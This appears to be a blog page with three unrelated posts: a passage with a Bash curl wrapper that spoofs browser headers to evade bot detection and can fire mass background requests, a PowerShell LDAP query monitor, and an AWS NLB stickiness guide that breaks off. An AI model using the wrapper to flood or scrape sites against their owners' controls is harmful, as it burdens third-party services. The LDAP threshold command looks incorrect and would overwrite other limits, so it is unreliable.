TIMEOUT=30
DATA=""
CONTENT_TYPE=""
COOKIE_FILE="/tmp/browser_curl_cookies_$$.txt"
VERBOSE=false

# Browser fingerprint (Chrome on macOS)
USER_AGENT="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"

usage() {
    cat << EOH
Usage: $(basename "$0") [OPTIONS] URL

Advanced curl wrapper that mimics browser behavior to bypass bot protection.

OPTIONS:
    -X, --method METHOD        HTTP method (GET, POST, PUT, DELETE, etc.) [default: GET]
    -d, --data DATA           POST/PUT data
    -H, --header HEADER       Add custom header (can be used multiple times)
    -o, --output FILE         Write output to file
    -c, --cookie FILE         Use custom cookie file [default: temp file]
    -A, --user-agent UA       Custom user agent [default: Chrome on macOS]
    -t, --timeout SECONDS     Request timeout [default: 30]
    --async                   Run request asynchronously in background
    --count N                 Number of async requests to fire [default: 1, requires --async]
    --no-redirect             Don't follow redirects
    --show-headers            Show response headers
    --json                    Send data as JSON (sets Content-Type)
    --form                    Send data as form-urlencoded
    -v, --verbose             Verbose output
    -h, --help                Show this help message

EXAMPLES:
    # Simple GET request
    $(basename "$0") https://example.com

    # Async GET request
    $(basename "$0") --async https://example.com

    # POST with JSON data
    $(basename "$0") -X POST --json -d '{"username":"test"}' https://api.example.com/login

    # POST with form data
    $(basename "$0") -X POST --form -d "username=test&password=secret" https://example.com/login

    # Multiple async requests (using loop)
    for i in {1..10}; do
        $(basename "$0") --async https://example.com/api/endpoint
    done

    # Multiple async requests (using --count)
    $(basename "$0") --async --count 10 https://example.com/api/endpoint

EOH
    exit 0
}

# Parse arguments
EXTRA_HEADERS=()
URL=""

while [[ $# -gt 0 ]]; do
    case $1 in
        -X|--method)
            METHOD="$2"
            shift 2
            ;;
        -d|--data)
            DATA="$2"
            shift 2
            ;;
        -H|--header)
            EXTRA_HEADERS+=("$2")
            shift 2
            ;;
        -o|--output)
            OUTPUT_FILE="$2"
            shift 2
            ;;
        -c|--cookie)
            COOKIE_FILE="$2"
            shift 2
            ;;
        -A|--user-agent)
            USER_AGENT="$2"
            shift 2
            ;;
        -t|--timeout)
            TIMEOUT="$2"
            shift 2
            ;;
        --async)
            ASYNC=true
            shift
            ;;
        --count)
            COUNT="$2"
            shift 2
            ;;
        --no-redirect)
            FOLLOW_REDIRECTS=false
            shift
            ;;
        --show-headers)
            SHOW_HEADERS=true
            shift
            ;;
        --json)
            CONTENT_TYPE="application/json"
            shift
            ;;
        --form)
            CONTENT_TYPE="application/x-www-form-urlencoded"
            shift
            ;;
        -v|--verbose)
            VERBOSE=true
            shift
            ;;
        -h|--help)
            usage
            ;;
        *)
            if [[ -z "$URL" ]]; then
                URL="$1"
            else
                echo -e "${RED}Error: Unknown argument '$1'${NC}" >&2
                exit 1
            fi
            shift
            ;;
    esac
done

# Validate URL
if [[ -z "$URL" ]]; then
    echo -e "${RED}Error: URL is required${NC}" >&2
    usage
fi

# Validate count
if [[ "$COUNT" -gt 1 ]] && [[ "$ASYNC" == false ]]; then
    echo -e "${RED}Error: --count requires --async${NC}" >&2
    exit 1
fi

if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [[ "$COUNT" -lt 1 ]]; then
    echo -e "${RED}Error: --count must be a positive integer${NC}" >&2
    exit 1
fi

# Execute curl
execute_curl() {
    # Build curl arguments as array instead of string
    local -a curl_args=()
    
    # Basic options
    curl_args+=("--compressed")
    curl_args+=("--max-time" "$TIMEOUT")
    curl_args+=("--connect-timeout" "10")
    curl_args+=("--http2")
    
    # Cookies (ensure file exists to avoid curl warning)
    : > "$COOKIE_FILE" 2>/dev/null || true
    curl_args+=("--cookie" "$COOKIE_FILE")
    curl_args+=("--cookie-jar" "$COOKIE_FILE")
    
    # Follow redirects
    if [[ "$FOLLOW_REDIRECTS" == true ]]; then
        curl_args+=("--location")
    fi
    
    # Show headers
    if [[ "$SHOW_HEADERS" == true ]]; then
        curl_args+=("--include")
    fi
    
    # Output file
    if [[ -n "$OUTPUT_FILE" ]]; then
        curl_args+=("--output" "$OUTPUT_FILE")
    fi
    
    # Verbose
    if [[ "$VERBOSE" == true ]]; then
        curl_args+=("--verbose")
    else
        curl_args+=("--silent" "--show-error")
    fi
    
    # Method
    curl_args+=("--request" "$METHOD")
    
    # Browser-like headers
    curl_args+=("--header" "User-Agent: $USER_AGENT")
    curl_args+=("--header" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8")
    curl_args+=("--header" "Accept-Language: en-US,en;q=0.9")
    curl_args+=("--header" "Accept-Encoding: gzip, deflate, br")
    curl_args+=("--header" "Connection: keep-alive")
    curl_args+=("--header" "Upgrade-Insecure-Requests: 1")
    curl_args+=("--header" "Sec-Fetch-Dest: document")
    curl_args+=("--header" "Sec-Fetch-Mode: navigate")
    curl_args+=("--header" "Sec-Fetch-Site: none")
    curl_args+=("--header" "Sec-Fetch-User: ?1")
    curl_args+=("--header" "Cache-Control: max-age=0")
    
    # Content-Type for POST/PUT
    if [[ -n "$DATA" ]]; then
        if [[ -n "$CONTENT_TYPE" ]]; then
            curl_args+=("--header" "Content-Type: $CONTENT_TYPE")
        fi
        curl_args+=("--data" "$DATA")
    fi
    
    # Extra headers
    for header in "${EXTRA_HEADERS[@]}"; do
        curl_args+=("--header" "$header")
    done
    
    # URL
    curl_args+=("$URL")
    
    if [[ "$ASYNC" == true ]]; then
        # Run asynchronously in background
        if [[ "$VERBOSE" == true ]]; then
            echo -e "${YELLOW}[ASYNC] Running $COUNT request(s) in background...${NC}" >&2
            echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
        fi
        
        # Fire multiple requests if count > 1
        local pids=()
        for ((i=1; i<=COUNT; i++)); do
            # Run in background detached, suppress all output
            nohup curl "${curl_args[@]}" >/dev/null 2>&1 &
            local pid=$!
            disown $pid
            pids+=("$pid")
        done
        
        if [[ "$COUNT" -eq 1 ]]; then
            echo -e "${GREEN}[ASYNC] Request started with PID: ${pids[0]}${NC}" >&2
        else
            echo -e "${GREEN}[ASYNC] $COUNT requests started with PIDs: ${pids[*]}${NC}" >&2
        fi
    else
        # Run synchronously
        if [[ "$VERBOSE" == true ]]; then
            echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
        fi
        
        curl "${curl_args[@]}"
        local exit_code=$?
        
        if [[ $exit_code -ne 0 ]]; then
            echo -e "${RED}[ERROR] Request failed with exit code: $exit_code${NC}" >&2
            return $exit_code
        fi
    fi
}

# Cleanup temp cookie file on exit (only if using default temp file)
cleanup() {
    if [[ "$COOKIE_FILE" == "/tmp/browser_curl_cookies_$$"* ]] && [[ -f "$COOKIE_FILE" ]]; then
        rm -f "$COOKIE_FILE"
    fi
}

# Only set cleanup trap for synchronous requests
if [[ "$ASYNC" == false ]]; then
    trap cleanup EXIT
fi

# Main execution
execute_curl

# For async requests, exit immediately without waiting
if [[ "$ASYNC" == true ]]; then
    exit 0
fi
EOF

Optionally, move it to your PATH:

sudo mv browser_curl.sh /usr/local/bin/browser_curl

Quick start

Simple GET request

./browser_curl.sh https://example.com

Async GET (returns immediately)

./browser_curl.sh --async https://example.com

Fire 100 async requests in one command

./browser_curl.sh --async --count 100 https://example.com/api

Common examples

POST JSON

./browser_curl.sh -X POST --json \
  -d '{"username":"user","password":"pass"}' \
  https://api.example.com/login

POST form data

./browser_curl.sh -X POST --form \
  -d "username=user&password=pass" \
  https://example.com/login

Include response headers

./browser_curl.sh --show-headers https://example.com

Save response to a file

./browser_curl.sh -o response.json https://api.example.com/data

Custom headers

./browser_curl.sh \
  -H "X-API-Key: your-key" \
  -H "Authorization: Bearer token" \
  https://api.example.com/data

Persistent cookies across requests

COOKIE_FILE="session_cookies.txt"

# Login and save cookies
./browser_curl.sh -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=test&pass=secret" \
  https://example.com/login

# Authenticated request using saved cookies
./browser_curl.sh -c "$COOKIE_FILE" \
  https://example.com/dashboard

Load testing patterns

Simple load test with --count

The easiest way to fire multiple requests:

./browser_curl.sh --async --count 100 https://example.com/api

Example output:

[ASYNC] 100 requests started with PIDs: 1234 1235 1236 ... 1333

Performance: 100 requests dispatched in approximately 0.09 seconds

Loop-based approach (alternative)

for i in {1..100}; do
  ./browser_curl.sh --async https://example.com/api
done

Timed load test

Run continuous requests for a specific duration:

#!/bin/bash
URL="https://example.com/api"
DURATION=60  # seconds
COUNT=0

END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
  ./browser_curl.sh --async "$URL" > /dev/null 2>&1
  ((COUNT++))
done

echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"

Parameterized load test script

#!/bin/bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"

echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""

START=$(date +%s)
./browser_curl.sh --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"

Usage:

./load_test.sh https://api.example.com/endpoint 200

Options reference

  • -X, --method HTTP method (GET/POST/PUT/DELETE) [default: GET]
  • -d, --data Request body (JSON or form)
  • -H, --header Add extra headers (repeatable)
  • -o, --output Write response to a file [default: stdout]
  • -c, --cookie Cookie file to use (and persist) [default: temp file]
  • -A, --user-agent Override User-Agent [default: Chrome on macOS]
  • -t, --timeout Max request time in seconds [default: 30]
  • --async Run request(s) in the background [default: off]
  • --count N Fire N async requests (requires --async) [default: 1]
  • --no-redirect Don’t follow redirects [default: follows]
  • --show-headers Include response headers [default: off]
  • --json Sets Content-Type: application/json
  • --form Sets Content-Type: application/x-www-form-urlencoded
  • -v, --verbose Verbose diagnostics [default: off]
  • -h, --help Show usage

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

Browser-like headers

The script automatically adds these headers to mimic Chrome:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif...
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
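
You can confirm these headers are actually sent by pointing the wrapper at an echo endpoint (httpbin.org assumed reachable; jq optional):

./browser_curl.sh https://httpbin.org/headers | jq .headers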

HTTP/2 + compression

  • Uses --http2 flag for HTTP/2 protocol support
  • Enables --compressed for automatic gzip/brotli decompression
  • Closer to modern browser behavior
  • Maintains session cookies across redirects and calls
  • Persists cookies to file for reuse
  • Automatically created and cleaned up

Redirect handling

  • Follows redirects by default with --location
  • Critical for login flows, SSO, and OAuth redirects

These features help bypass basic bot detection that blocks obvious non-browser clients.

Real-world examples

Example 1: API authentication flow

cat > test_auth.sh << 'SCRIPT'
#!/bin/bash
COOKIE_FILE="auth_session.txt"
API_BASE="https://api.example.com"

echo "Logging in..."
./browser_curl.sh -c "$COOKIE_FILE" -X POST --json -d '{"username":"user","password":"pass"}' "$API_BASE/auth/login" > /dev/null

echo "Fetching profile..."
./browser_curl.sh -c "$COOKIE_FILE" "$API_BASE/user/profile" | jq .

echo "Load testing..."
./browser_curl.sh -c "$COOKIE_FILE" --async --count 50 "$API_BASE/api/data"

echo "Done!"
rm -f "$COOKIE_FILE"
SCRIPT
chmod +x test_auth.sh
./test_auth.sh

Example 2: Scraping with rate limiting

#!/bin/bash
URLS=(
  "https://example.com/page1"
  "https://example.com/page2"
  "https://example.com/page3"
)

for url in "${URLS[@]}"; do
  echo "Fetching: $url"
  ./browser_curl.sh -o "$(basename "$url").html" "$url"
  sleep 2  # Rate limiting
done

Example 3: Health check monitoring

#!/bin/bash
ENDPOINT="https://api.example.com/health"

while true; do
  if ./browser_curl.sh "$ENDPOINT" | grep -q "healthy"; then
    echo "$(date): Service healthy"
  else
    echo "$(date): Service unhealthy"
  fi
  sleep 30
done

Installing browser_curl to your PATH

If you want browser_curl.sh to be available everywhere, install it on your PATH:

mkdir -p ~/.local/bin
echo "Installing browser_curl to ~/.local/bin/browser_curl"
install -m 0755 ./browser_curl.sh ~/.local/bin/browser_curl

echo "Ensuring ~/.local/bin is on PATH via ~/.zshrc"
grep -q 'export PATH="$HOME/.local/bin:$PATH"' ~/.zshrc || \
  echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc

echo "Reloading shell config (~/.zshrc)"
source ~/.zshrc

echo "Verifying browser_curl is on PATH"
command -v browser_curl && echo "browser_curl is installed and on PATH" || echo "browser_curl not found on PATH"

Troubleshooting

Issue: Hanging with dquote> prompt

Cause: Shell quoting issue (unbalanced quotes)

Solution: Use simple, direct commands

# Good
./browser_curl.sh --async https://example.com

# Bad (unbalanced quotes)
echo "test && ./browser_curl.sh --async https://example.com && echo "done"

For chaining commands:

echo Start; ./browser_curl.sh --async https://example.com; echo Done

Issue: Verbose mode produces too much output

Cause: -v flag prints all curl diagnostics to stderr

Solution: Remove -v for production use:

# Debug mode
./browser_curl.sh -v https://example.com

# Production mode
./browser_curl.sh https://example.com

Issue: curl warns about a missing cookie file

Cause: First-time cookie file creation

Solution: The script now pre-creates the cookie file automatically. You can ignore any residual warnings.

Issue: 403 Forbidden errors

Cause: Site has stronger protections (JavaScript challenges, TLS fingerprinting)

Solution: Consider using real browser automation:

  • Playwright (Python/Node.js)
  • Selenium
  • Puppeteer

Or combine approaches:

  1. Use Playwright to initialize session and get cookies
  2. Export cookies to file (see the conversion sketch after this list)
  3. Use browser_curl.sh -c cookies.txt for subsequent requests
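
One possible shape for step 2 is converting Playwright’s storageState JSON into the Netscape cookie-jar format curl reads. A sketch assuming jq is installed (file names illustrative; session cookies get expiry 0):

# Convert Playwright storageState JSON into a curl-readable Netscape cookie jar
printf '# Netscape HTTP Cookie File\n' > cookies.txt
jq -r '.cookies[] | [
  .domain,
  (if (.domain | startswith(".")) then "TRUE" else "FALSE" end),
  .path,
  (if .secure then "TRUE" else "FALSE" end),
  ((.expires // 0) | if . < 0 then 0 else floor end | tostring),
  .name,
  .value
] | @tsv' storage_state.json >> cookies.txt
./browser_curl.sh -c cookies.txt https://example.com/dashboard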

Performance benchmarks

Tests conducted on 2023 MacBook Pro M2, macOS Sonoma:

  • Single sync request: approximately 0.2s
  • 10 async requests (--count): approximately 0.03s (333 requests/sec)
  • 100 async requests (--count): approximately 0.09s (1111 requests/sec)
  • 1000 async requests (--count): approximately 0.8s (1250 requests/sec)

Note: Dispatch time only; actual HTTP completion depends on target server.

Limitations

What this script CANNOT do

  • JavaScript execution – Can’t solve JS challenges (use Playwright)
  • CAPTCHA solving – Requires human intervention or services
  • Advanced TLS fingerprinting – Can’t mimic exact browser TLS stack
  • HTTP/2 fingerprinting – Can’t perfectly match browser HTTP/2 frames
  • WebSocket connections – HTTP only
  • Browser API access – No Canvas, WebGL, Web Crypto fingerprints

What this script CAN do

  • Basic header spoofing – Pass simple User-Agent checks
  • Cookie management – Maintain sessions
  • Load testing – Quick async request dispatch
  • API testing – POST/PUT/DELETE with JSON/form data
  • Simple scraping – Pages without JS requirements
  • Health checks – Monitoring endpoints

When to use what

Use browser_curl.sh when:

  • Target has basic bot detection (header checks)
  • API testing with authentication
  • Quick load testing (less than 10k requests)
  • Monitoring/health checks
  • No JavaScript required
  • You want a lightweight tool

Use Playwright/Selenium when:

  • Target requires JavaScript execution
  • CAPTCHA challenges present
  • Advanced fingerprinting detected
  • Need to interact with dynamic content
  • Heavy scraping with anti-bot measures
  • Login flows with MFA/2FA

Hybrid approach:

  1. Use Playwright to bootstrap session
  2. Extract cookies
  3. Use browser_curl.sh for follow-up requests (faster)

Advanced: Combining with other tools

With jq for JSON processing

./browser_curl.sh https://api.example.com/users | jq '.[] | .name'

With parallel for concurrency control

cat urls.txt | parallel -j 10 "./browser_curl.sh -o {#}.html {}"

With watch for monitoring

watch -n 5 "./browser_curl.sh https://api.example.com/health | jq .status"

With xargs for batch processing

cat ids.txt | xargs -I {} ./browser_curl.sh "https://api.example.com/item/{}"

Future enhancements

Potential features to add:

  • Rate limiting – Built-in requests/second throttling
  • Retry logic – Exponential backoff on failures
  • Output formats – JSON-only, CSV, headers-only modes
  • Proxy support – SOCKS5/HTTP proxy options
  • Custom TLS – Certificate pinning, client certs
  • Response validation – Assert status codes, content patterns
  • Metrics collection – Timing stats, success rates
  • Configuration file – Default settings per domain

Conclusion

browser_curl.sh provides a pragmatic middle ground between plain curl and full browser automation. For many APIs and websites with basic bot filters, browser-like headers, proper protocol use, and cookie handling are sufficient.

Key takeaways:

  • Simple wrapper around curl with realistic browser behavior
  • Async mode with --count for easy load testing
  • Works for basic bot detection, not advanced challenges
  • Combine with Playwright for tough targets
  • Lightweight and fast for everyday API work

The script is particularly useful for:

  • API development and testing
  • Quick load testing during development
  • Monitoring and health checks
  • Simple scraping tasks
  • Learning curl features

For production load testing at scale, consider tools like k6, Locust, or Artillery. For heavy web scraping with anti-bot measures, invest in proper browser automation infrastructure.


Windows Domain Controller: Monitor and Log LDAP operations/queries use of resources

The script below monitors LDAP operations on a Domain Controller and logs detailed information about queries that exceed specified thresholds for execution time, CPU usage, or results returned. It helps identify problematic LDAP queries that may be impacting domain controller performance.

Parameter: ThresholdSeconds
Minimum query duration in seconds to log (default: 5)

Parameter: LogPath
Path where log files will be saved (default: C:\LDAPDiagnostics)

Parameter: MonitorDuration
How long to monitor in minutes (default: continuous)

EXAMPLE
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -LogPath "C:\Logs\LDAP"

```powershell
[CmdletBinding()]
param(
    [int]$ThresholdSeconds = 5,
    [string]$LogPath = "C:\LDAPDiagnostics",
    [int]$MonitorDuration = 0  # 0 = continuous
)

# Requires Administrator privileges
#Requires -RunAsAdministrator

# Create log directory if it doesn't exist
if (-not (Test-Path $LogPath)) {
    New-Item -ItemType Directory -Path $LogPath -Force | Out-Null
}

$logFile = Join-Path $LogPath "LDAP_Diagnostics_$(Get-Date -Format 'yyyyMMdd_HHmmss').log"
$csvFile = Join-Path $LogPath "LDAP_Queries_$(Get-Date -Format 'yyyyMMdd_HHmmss').csv"

function Write-Log {
    param([string]$Message, [string]$Level = "INFO")
    $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
    $logMessage = "[$timestamp] [$Level] $Message"
    Write-Host $logMessage
    Add-Content -Path $logFile -Value $logMessage
}

function Get-LDAPStatistics {
    try {
        # Query NTDS performance counters for LDAP statistics
        $ldapStats = @{
            ActiveThreads = (Get-Counter '\NTDS\LDAP Active Threads' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
            SearchesPerSec = (Get-Counter '\NTDS\LDAP Searches/sec' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
            ClientSessions = (Get-Counter '\NTDS\LDAP Client Sessions' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
            BindTime = (Get-Counter '\NTDS\LDAP Bind Time' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
        }
        return $ldapStats
    }
    catch {
        Write-Log "Error getting LDAP statistics: $_" "ERROR"
        return $null
    }
}

function Parse-LDAPEvent {
    param($Event)
    
    $eventData = @{
        TimeCreated = $Event.TimeCreated
        ClientIP = $null
        ClientPort = $null
        StartingNode = $null
        Filter = $null
        SearchScope = $null
        AttributeSelection = $null
        ServerControls = $null
        VisitedEntries = $null
        ReturnedEntries = $null
        TimeInServer = $null
    }

    # Parse event XML for detailed information
    try {
        $xml = [xml]$Event.ToXml()
        $dataNodes = $xml.Event.EventData.Data
        
        foreach ($node in $dataNodes) {
            switch ($node.Name) {
                "Client" { $eventData.ClientIP = ($node.'#text' -split ':')[0] }
                "StartingNode" { $eventData.StartingNode = $node.'#text' }
                "Filter" { $eventData.Filter = $node.'#text' }
                "SearchScope" { $eventData.SearchScope = $node.'#text' }
                "AttributeSelection" { $eventData.AttributeSelection = $node.'#text' }
                "ServerControls" { $eventData.ServerControls = $node.'#text' }
                "VisitedEntries" { $eventData.VisitedEntries = $node.'#text' }
                "ReturnedEntries" { $eventData.ReturnedEntries = $node.'#text' }
                "TimeInServer" { $eventData.TimeInServer = $node.'#text' }
            }
        }
    }
    catch {
        Write-Log "Error parsing event XML: $_" "WARNING"
    }

    return $eventData
}

Write-Log "=== LDAP Query Diagnostics Started ===" "INFO"
Write-Log "Threshold: $ThresholdSeconds seconds" "INFO"
Write-Log "Log Path: $LogPath" "INFO"
Write-Log "Monitor Duration: $(if($MonitorDuration -eq 0){'Continuous'}else{$MonitorDuration + ' minutes'})" "INFO"

# Enable Field Engineering logging if not already enabled
Write-Log "Checking Field Engineering diagnostic logging settings..." "INFO"
try {
    $regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics"
    $currentValue = Get-ItemProperty -Path $regPath -Name "15 Field Engineering" -ErrorAction SilentlyContinue
    
    if ($currentValue.'15 Field Engineering' -lt 5) {
        Write-Log "Enabling Field Engineering logging (level 5)..." "INFO"
        Set-ItemProperty -Path $regPath -Name "15 Field Engineering" -Value 5
        Write-Log "Field Engineering logging enabled. You may need to restart NTDS service for full effect." "WARNING"
    }
    else {
        Write-Log "Field Engineering logging already enabled at level $($currentValue.'15 Field Engineering')" "INFO"
    }
}
catch {
    Write-Log "Error configuring diagnostic logging: $_" "ERROR"
}

# Create CSV header
$csvHeader = "TimeCreated,ClientIP,StartingNode,Filter,SearchScope,AttributeSelection,VisitedEntries,ReturnedEntries,TimeInServer,ServerControls"
Set-Content -Path $csvFile -Value $csvHeader

Write-Log "Monitoring for expensive LDAP queries (threshold: $ThresholdSeconds seconds)..." "INFO"
Write-Log "Press Ctrl+C to stop monitoring" "INFO"

$startTime = Get-Date
$queriesLogged = 0

try {
    while ($true) {
        # Check if monitoring duration exceeded
        if ($MonitorDuration -gt 0) {
            $elapsed = (Get-Date) - $startTime
            if ($elapsed.TotalMinutes -ge $MonitorDuration) {
                Write-Log "Monitoring duration reached. Stopping." "INFO"
                break
            }
        }

        # Get current LDAP statistics
        $stats = Get-LDAPStatistics
        if ($stats) {
            Write-Verbose "Active Threads: $($stats.ActiveThreads), Searches/sec: $($stats.SearchesPerSec), Client Sessions: $($stats.ClientSessions)"
        }

        # Query Directory Service event log for expensive LDAP queries
        # Event ID 1644 = expensive search operations
        $events = Get-WinEvent -FilterHashtable @{
            LogName = 'Directory Service'
            Id = 1644
            StartTime = (Get-Date).AddSeconds(-10)
        } -ErrorAction SilentlyContinue

        foreach ($event in $events) {
            $eventData = Parse-LDAPEvent -Event $event
            
            # Convert time in server from milliseconds to seconds
            $timeInSeconds = if ($eventData.TimeInServer) { 
                [int]$eventData.TimeInServer / 1000 
            } else { 
                0 
            }

            if ($timeInSeconds -ge $ThresholdSeconds) {
                $queriesLogged++
                
                Write-Log "=== Expensive LDAP Query Detected ===" "WARNING"
                Write-Log "Time: $($eventData.TimeCreated)" "WARNING"
                Write-Log "Client IP: $($eventData.ClientIP)" "WARNING"
                Write-Log "Duration: $timeInSeconds seconds" "WARNING"
                Write-Log "Starting Node: $($eventData.StartingNode)" "WARNING"
                Write-Log "Filter: $($eventData.Filter)" "WARNING"
                Write-Log "Search Scope: $($eventData.SearchScope)" "WARNING"
                Write-Log "Visited Entries: $($eventData.VisitedEntries)" "WARNING"
                Write-Log "Returned Entries: $($eventData.ReturnedEntries)" "WARNING"
                Write-Log "Attributes: $($eventData.AttributeSelection)" "WARNING"
                Write-Log "Server Controls: $($eventData.ServerControls)" "WARNING"
                Write-Log "======================================" "WARNING"

                # Write to CSV
                $csvLine = "$($eventData.TimeCreated),$($eventData.ClientIP),$($eventData.StartingNode),`"$($eventData.Filter)`",$($eventData.SearchScope),`"$($eventData.AttributeSelection)`",$($eventData.VisitedEntries),$($eventData.ReturnedEntries),$($eventData.TimeInServer),`"$($eventData.ServerControls)`""
                Add-Content -Path $csvFile -Value $csvLine
            }
        }

        Start-Sleep -Seconds 5
    }
}
catch {
    Write-Log "Error during monitoring: $_" "ERROR"
}
finally {
    Write-Log "=== LDAP Query Diagnostics Stopped ===" "INFO"
    Write-Log "Total expensive queries logged: $queriesLogged" "INFO"
    Write-Log "Log file: $logFile" "INFO"
    Write-Log "CSV file: $csvFile" "INFO"
}
```
## Usage Examples

### Basic Usage (Continuous Monitoring)

Run with default settings - monitors queries taking 5+ seconds:

```powershell
.\Diagnose-LDAPQueries.ps1
```

### Custom Threshold and Duration

Monitor for 30 minutes, logging queries that take 3+ seconds:

```powershell
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -MonitorDuration 30
```

### Custom Log Location

Save logs to a specific directory:

```powershell
.\Diagnose-LDAPQueries.ps1 -LogPath "D:\Logs\LDAP"
```

### Verbose Output

See real-time LDAP statistics while monitoring:

```powershell
.\Diagnose-LDAPQueries.ps1 -Verbose
```

## Requirements

- **Administrator privileges** on the domain controller
- **Windows Server** with Active Directory Domain Services role
- **PowerShell 5.1 or later**

## Understanding the Output

### Log File Example

```
[2025-01-15 14:23:45] [WARNING] === Expensive LDAP Query Detected ===
[2025-01-15 14:23:45] [WARNING] Time: 01/15/2025 14:23:43
[2025-01-15 14:23:45] [WARNING] Client IP: 192.168.1.50
[2025-01-15 14:23:45] [WARNING] Duration: 8.5 seconds
[2025-01-15 14:23:45] [WARNING] Starting Node: DC=contoso,DC=com
[2025-01-15 14:23:45] [WARNING] Filter: (&(objectClass=user)(memberOf=*))
[2025-01-15 14:23:45] [WARNING] Search Scope: 2
[2025-01-15 14:23:45] [WARNING] Visited Entries: 45000
[2025-01-15 14:23:45] [WARNING] Returned Entries: 12000
```

### What to Look For

- **High visited/returned ratio** - Indicates an inefficient filter
- **Subtree searches from root** - Often unnecessarily broad
- **Wildcard filters** - Like `(cn=*)` can be very expensive
- **Unindexed attributes** - Queries on non-indexed attributes visit many entries
- **Repeated queries** - Same client making the same expensive query repeatedly
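
To confirm a suspect filter is genuinely expensive, you can replay it read-only from an admin host. A sketch using OpenLDAP's `ldapsearch` (server name, bind account, and base DN are illustrative):

```bash
# Replay the logged filter with a minimal attribute list and watch the DC counters
ldapsearch -H ldap://dc01.contoso.com -D 'svc-audit@contoso.com' -W \
  -b 'DC=contoso,DC=com' -s sub \
  '(&(objectClass=user)(memberOf=*))' dn | head -n 20
```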

## Troubleshooting Common Issues

### No Events Appearing

If you're not seeing Event ID 1644, you may need to lower the expensive search threshold in Active Directory:

```powershell
# Lower the threshold to 1000ms (1 second)
Get-ADObject "CN=Query-Policies,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=yourdomain,DC=com" | 
    Set-ADObject -Replace @{lDAPAdminLimits="MaxQueryDuration=1000"}
```

### Script Requires Restart

After enabling Field Engineering logging, you may need to restart the NTDS service:

```powershell
Restart-Service NTDS -Force
```

## Best Practices

1. **Run during peak hours** to capture real-world problematic queries
2. **Start with a lower threshold** (2-3 seconds) to catch more queries
3. **Analyze the CSV** in Excel or Power BI for patterns
4. **Correlate with client IPs** to identify problematic applications
5. **Work with application owners** to optimize queries with indexes or better filters

Once you’ve identified expensive queries:

1. **Add indexes** for frequently searched attributes
2. **Optimize LDAP filters** to be more specific (see the example after this list)
3. **Reduce search scope** where possible
4. **Implement paging** for large result sets
5. **Cache results** on the client side when appropriate
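
For item 2, a rewrite along these lines (group DN illustrative) typically cuts visited entries sharply, because sAMAccountType is indexed while the original filter evaluates memberOf against every user object:

```
# Before: visits every user object to test memberOf=*
(&(objectClass=user)(memberOf=*))
# After: indexed attribute plus one specific group
(&(sAMAccountType=805306368)(memberOf=CN=App-Users,OU=Groups,DC=contoso,DC=com))
```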

This script has helped me identify numerous performance bottlenecks in production environments. I hope it helps you optimize your Active Directory infrastructure as well!


Deep Dive: AWS NLB Sticky Sessions (stickiness) Setup, Behavior, and Hidden Pitfalls

When you deploy applications behind a Network Load Balancer (NLB) in AWS, you usually expect perfect traffic distribution: fast, fair, and stateless.
But what if your backend holds stateful sessions, like in-memory login sessions, caching, or WebSocket connections, and you need a given client to keep hitting the same target every time?

That’s where NLB sticky sessions (also called connection stickiness or source IP affinity) come in. They’re powerful but often misunderstood, and misconfiguring them can lead to uneven load, dropped connections, or mysterious client “resets.”

Let’s break down exactly how they work, how to set them up, what to watch for, and how to troubleshoot the tricky edge cases that appear in production.


1. What Are Sticky Sessions on an NLB?

At a high level, sticky sessions ensure that traffic from the same client consistently lands on the same target (EC2 instance, IP, or container) behind your NLB.

Unlike the Application Load Balancer (ALB), which uses HTTP cookies for stickiness, the NLB operates at Layer 4 (TCP/UDP).
That means it doesn’t look inside your packets. Instead, it bases stickiness on network-level parameters like:

  • Source IP address
  • Destination IP and port
  • Source port (sometimes included in the hash)
  • Protocol (TCP, UDP, or TLS passthrough)

AWS refers to this as “source IP affinity.”
When enabled, the NLB creates a flow-hash mapping that ties the client to a backend target.
As long as the hash remains the same, the same client gets routed to the same target, even across multiple connections.


2. Enabling Sticky Sessions on an AWS NLB

Stickiness is configured per target group, not at the NLB level.

Step-by-Step via AWS Console

  1. Go to EC2 → Load Balancers → Target Groups
    Find the target group your NLB listener uses.
  2. Select the Target Group → Attributes tab.
  3. Under Attributes, set:
  • Stickiness.enabled = true
  • Stickiness.type = source_ip
  4. Save changes and confirm the attributes are updated.

Step-by-Step via AWS CLI

```bash
aws elbv2 modify-target-group-attributes \
  --target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/mytg/abc123 \
  --attributes Key=stickiness.enabled,Value=true Key=stickiness.type,Value=source_ip
```

How to Verify:

```bash
aws elbv2 describe-target-group-attributes \
